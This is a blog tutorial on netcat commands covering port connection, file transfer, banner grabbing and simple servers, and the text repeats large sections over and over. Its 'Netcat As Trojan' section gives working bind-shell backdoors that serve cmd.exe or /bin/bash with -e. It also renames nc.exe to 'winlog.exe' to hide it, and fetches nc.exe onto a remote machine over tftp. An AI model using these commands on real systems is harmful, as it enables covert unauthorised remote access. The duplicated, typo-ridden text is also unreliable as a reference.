In This Artical We'll Discuss About NETCAT Commands & Use
Netcat Connecting
Run nc in connect mode and connect to port 139nc -p 31337 127.0.0.1139
Run nc in connect mode and connect to port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e Executes a program if netcat is compiled with the – DGAPING_SECURITY_HOLE.
Nc.exe is compiled to execute when -e is used.
Example
nc-l -d -p 10000 -e cmd.exe or
nc-L -d -p 10000 -e cmd.exe
This will run nc in detached mode and listen on port 10000.
Netcat Listen
Use –L switch to reconnect to the same NetCat sessions.
This way you can connect over and over to the same Netcat process.
Example:
nc -l -p 53 -t -e cmd.exe
nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start Netcat with the following command:
nc –l –p 1234 >newfile
On the source system send a file named newfile to the destination system with the following command:
nc destinationIP 1234 < newfile
Netcat Banner Grabbing
nc –vvn hostIP 80
nc –vvn hostIP 8080
Once Connected Type HEAD / HTTP/1.0 [Hit enter twice]
nc -v www.website.com 80 < get.txt
Checking WEB Header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket "GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt | nc hostIP 80
----- begin get.txt -----
GET / HTTP/1.0
This Is Just Some Commands of Netcat to show the power and Versatility of Netcat.
Okay So Let's Start.
Important Switches
- -d Detach from console, stealth mode
- -e prog Inbound program to exec [dangerous!!]
- -g Source-routing hop point[s], up to 8
- -G num Source-routing pointer: 4, 8, 12, ...
- -i secs Delay interval for lines sent, ports scanned
- -l Listen mode, for inbound connects
- -L Listen harder, re-listen on socket close
- -n Numeric-only IP addresses, no DNS
- -o file Hex dump of traffic
- -p port Local port number
- -r Randomize local and remote ports
- -s addr Local source address
- -t Answer TELNET negotiation
- -u UDP mode
- -v Verbose [use twice to be more verbose]
- -w secs Timeout for connects and final net reads
- -z Zero-I/O mode [used for scanning]
Netcat Connecting
Run nc in connect mode and connect to port 139nc -p 31337 127.0.0.1139
Run nc in connect mode and connect to port 139 and give verbose display -v -v two times make more verbose
nc -v -v -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connect mode and connect to port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e Executes a program if netcat is compiled with the – DGAPING_SECURITY_HOLE.
Nc.exe is compiled to execute when -e is used.
Example
nc-l -d -p 10000 -e cmd.exe or
nc-L -d -p 10000 -e cmd.exe
This will run nc in detached mode and listen on port 10000.
Netcat Listen
Use –L switch to reconnect to the same NetCat sessions.
This way you can connect over and over to the same Netcat process.
Example:
nc -l -p 53 -t -e cmd.exe
nc -l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start Netcat with the following command:
nc –l –p 1234 >newfile
On the source system send a file named newfile to the destination system with the following command:
nc destinationIP 1234 < newfile
Netcat Banner Grabbing
nc –vvn hostIP 80
nc –vvn hostIP 8080
Once Connected Type HEAD / HTTP/1.0 [Hit enter twice]
nc -v www.website.com 80 < get.txt
Checking WEB Header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket "GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt | nc hostIP 80
Netcat Web Banner Grabber
First File is a text file:
----- begin get.txt -----
GET / HTTP/1.0
HIT ENTER IN YOUR EDITOR
HIT ENTER IN YOUR EDITOR
----- end get.txt -----
The second file is a batch file:
----- begin getweb.cmd -----
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
@echo off
nc -v %1 80 < get.txt > index.txt
notepad index.txt
----- end getweb.cmd -----
You run it like this: getweb.cmd www.anyweb.com
Netcat Finger & Telnet
Netcat as a simple finger client:
nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.
You can also send the output to a log file.
nc -v hostIP 79 < user.txt > log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23
nc -v hostIP 79 < user.txt
The file “user.txt contains the username you are interested in.
You can also send the output to a log file.
nc -v hostIP 79 < user.txt > log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d 127.0.0.1 -p 23
Netcat Simple Server
To create a simple server
nc -l -p 1234 < file
A very simple web server
nc -L -d -p 80 < file
A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe
A very simple web server
nc -L -d -p 80 < file
A simple telnet server with execution
nc -L -d -p 23 -t -e cmd.exe
Netcat As Trojan
We will use –t switch to answer telnet negotiation. Netcat should be compiled with –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/or nc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)
nc -l -d -t -p 10000 -e cmd.exe and/or nc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)
Connect to your trojan using
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe
tftp –i remoteip GET nc.exe
This Is Just Some Commands of Netcat to show the power and Versatility of Netcat.
No comments :
Post a Comment